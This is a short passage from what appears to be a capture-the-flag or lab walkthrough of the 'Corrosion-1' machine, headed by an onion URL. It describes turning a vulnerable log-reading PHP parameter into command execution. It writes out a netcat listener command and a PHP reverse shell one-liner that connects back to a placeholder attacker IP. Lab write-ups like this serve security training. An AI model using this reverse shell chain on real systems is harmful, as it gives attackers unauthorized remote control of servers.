http://r2km7u25qebaefa7b6jdcjldymc2u337vzpx7ne773ypgs3qlq4xycqd.onion/index.php?page=Corrosion-1
file=/var/log/auth.log&cmd=id To obtain a proper shell, I set up a netcat listener on my attack machine: $ nc -lvnp 4444 Then I sent a URL-encoded PHP reverse shell command to the target: http://[TARGET_IP]/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=php -r '$sock=fsockopen("[ATTACKER_IP]",4444);exec("/bin/bash <&3 >&3 2>&3");' This successfully established a reverse shell connection to my attacking machine, providing me with command execution on the target server.